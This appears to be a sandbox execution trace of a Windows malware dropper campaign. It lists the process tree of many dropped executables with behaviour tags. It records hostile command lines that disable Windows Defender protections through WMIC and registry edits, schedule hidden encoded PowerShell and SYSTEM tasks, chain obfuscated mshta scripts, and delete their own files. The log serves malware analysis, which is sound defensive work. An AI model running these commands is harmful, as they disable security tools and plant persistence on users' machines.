C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "5BudUgFVj7SjIU6cVKqGBoSH.exe" /f7⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\avQ5spkoN5PQwlUAL4AOWn7V.exe"C:\Users\Admin\Documents\avQ5spkoN5PQwlUAL4AOWn7V.exe" /mixtwo4⤵
-
C:\Users\Admin\Documents\ycqebZfR_uypvpOOf_9nytPW.exe"C:\Users\Admin\Documents\ycqebZfR_uypvpOOf_9nytPW.exe"4⤵
-
C:\Users\Admin\Documents\ycqebZfR_uypvpOOf_9nytPW.exe"C:\Users\Admin\Documents\ycqebZfR_uypvpOOf_9nytPW.exe"5⤵
-
C:\Users\Admin\Documents\eMIN_Aj72Vn10NEFTIIK1vHs.exe"C:\Users\Admin\Documents\eMIN_Aj72Vn10NEFTIIK1vHs.exe"4⤵
-
C:\Users\Admin\Documents\a7gsYWKZFTyxH1VS4OAF8KcE.exe"C:\Users\Admin\Documents\a7gsYWKZFTyxH1VS4OAF8KcE.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS32C4.tmp\Install.exe.\Install.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS33CE.tmp\Install.exe.\Install.exe /S /site_id "668658"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True10⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True10⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True10⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True10⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAfakHSBx" /SC once /ST 15:32:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAfakHSBx"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAfakHSBx"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEwGusBEGbIeKSSfjR" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\DfSKBUo.exe\" XY /site_id 668658 /S" /V1 /F7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\80fKkz4YE_xOc_H4VRK1L50y.exe"C:\Users\Admin\Documents\80fKkz4YE_xOc_H4VRK1L50y.exe"4⤵
-
C:\ProgramData\8862011.exe"C:\ProgramData\8862011.exe"5⤵
-
C:\ProgramData\3780464.exe"C:\ProgramData\3780464.exe"5⤵
-
C:\ProgramData\3353996.exe"C:\ProgramData\3353996.exe"5⤵
-
C:\Users\Admin\Documents\LhoEvLqaCtzHYw9fKanbEvs1.exe"C:\Users\Admin\Documents\LhoEvLqaCtzHYw9fKanbEvs1.exe"4⤵
-
C:\Users\Admin\Documents\Sb5sDU90bNy1ZbHTIvsJW1oI.exe"C:\Users\Admin\Documents\Sb5sDU90bNy1ZbHTIvsJW1oI.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IQ6HL.tmp\Sb5sDU90bNy1ZbHTIvsJW1oI.tmp"C:\Users\Admin\AppData\Local\Temp\is-IQ6HL.tmp\Sb5sDU90bNy1ZbHTIvsJW1oI.tmp" /SL5="$502E4,506127,422400,C:\Users\Admin\Documents\Sb5sDU90bNy1ZbHTIvsJW1oI.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HI99K.tmp\Chmenka.exe"C:\Users\Admin\AppData\Local\Temp\is-HI99K.tmp\Chmenka.exe" /S /UID=1246⤵
-
C:\Program Files\Windows Sidebar\KJOWQDMYEV\IDownload.exe"C:\Program Files\Windows Sidebar\KJOWQDMYEV\IDownload.exe" /VERYSILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6T6C1.tmp\IDownload.tmp"C:\Users\Admin\AppData\Local\Temp\is-6T6C1.tmp\IDownload.tmp" /SL5="$505E6,994212,425984,C:\Program Files\Windows Sidebar\KJOWQDMYEV\IDownload.exe" /VERYSILENT8⤵
-
C:\Program Files (x86)\IDownload\IDownload.App.exe"C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu9⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qeeorm2u.cmdline"10⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9435.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9434.tmp"11⤵
-
C:\Users\Admin\AppData\Local\Temp\d2-84a9d-8c8-18baf-521b7a95153ee\Havyraehyba.exe"C:\Users\Admin\AppData\Local\Temp\d2-84a9d-8c8-18baf-521b7a95153ee\Havyraehyba.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aj1hcrtg.vch\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\aj1hcrtg.vch\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\aj1hcrtg.vch\GcleanerEU.exe /eufive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aiankqxu.ghf\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\aiankqxu.ghf\installer.exeC:\Users\Admin\AppData\Local\Temp\aiankqxu.ghf\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0wlwvxf.0yq\anyname.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\c0wlwvxf.0yq\anyname.exeC:\Users\Admin\AppData\Local\Temp\c0wlwvxf.0yq\anyname.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slrwaayc.if4\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\slrwaayc.if4\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\slrwaayc.if4\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ftqa13it.y0g\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ec-8f902-eda-9cfb7-d604307b58280\Vaeqypehoma.exe"C:\Users\Admin\AppData\Local\Temp\ec-8f902-eda-9cfb7-d604307b58280\Vaeqypehoma.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 19888⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\jNc1pEtkubgEg8zfQEcmSPJb.exe"C:\Users\Admin\Documents\jNc1pEtkubgEg8zfQEcmSPJb.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im jNc1pEtkubgEg8zfQEcmSPJb.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\jNc1pEtkubgEg8zfQEcmSPJb.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im jNc1pEtkubgEg8zfQEcmSPJb.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\IeEnYAjtISOkrI8ktFcjax_C.exe"C:\Users\Admin\Documents\IeEnYAjtISOkrI8ktFcjax_C.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\IeEnYAjtISOkrI8ktFcjax_C.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\pUiOCGpiuWE56__g7zn7wgiy.exe"C:\Users\Admin\Documents\pUiOCGpiuWE56__g7zn7wgiy.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\pUiOCGpiuWE56__g7zn7wgiy.exeC:\Users\Admin\Documents\pUiOCGpiuWE56__g7zn7wgiy.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\EFSrSTr3JXsgTz2Mqfr4osXz.exe"C:\Users\Admin\Documents\EFSrSTr3JXsgTz2Mqfr4osXz.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Ctmuz_mgcbdsPCC6e_V8tHCx.exe"C:\Users\Admin\Documents\Ctmuz_mgcbdsPCC6e_V8tHCx.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Ctmuz_mgcbdsPCC6e_V8tHCx.exe"C:\Users\Admin\Documents\Ctmuz_mgcbdsPCC6e_V8tHCx.exe"3⤵
-
C:\Users\Admin\Documents\eT_9cn5sogyGhue3prfopPYK.exe"C:\Users\Admin\Documents\eT_9cn5sogyGhue3prfopPYK.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\IcbJmhRrOFBl0UiaasKlmKnL.exe"C:\Users\Admin\Documents\IcbJmhRrOFBl0UiaasKlmKnL.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\yHhWol0ocSjBIpiSrBNEOAvh.exe"C:\Users\Admin\Documents\yHhWol0ocSjBIpiSrBNEOAvh.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\FfdIL49jVDLo2ZZ0ZoNZ1NHV.exe"C:\Users\Admin\Documents\FfdIL49jVDLo2ZZ0ZoNZ1NHV.exe"2⤵
-
C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe"C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF ""== "" for %w In ( "C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe" ) do taskkill /F -iM "%~nxw"4⤵
-
C:\Users\Admin\AppData\Local\Temp\CndH5V.EXeCndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ( "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -iM "nCnloXCBBzF9fhloqAx3zURj.exe"5⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\GdnnpR16mo1HV765iNORwo65.exe"C:\Users\Admin\Documents\GdnnpR16mo1HV765iNORwo65.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe"C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exeC:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe3⤵
-
C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exeC:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe4⤵
-
C:\Users\Admin\Documents\qGRZQFt259hYnjlOy8zzT1Jx.exe"C:\Users\Admin\Documents\qGRZQFt259hYnjlOy8zzT1Jx.exe"2⤵
-
C:\Users\Admin\Documents\ggzTxW5tUk6YcGJDsx97Qe3B.exe"C:\Users\Admin\Documents\ggzTxW5tUk6YcGJDsx97Qe3B.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa53544f50,0x7ffa53544f60,0x7ffa53544f704⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1652 /prefetch:24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1696 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5864 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings4⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff6729da890,0x7ff6729da8a0,0x7ff6729da8b05⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1564 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=848 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3868 /prefetch:84⤵
-
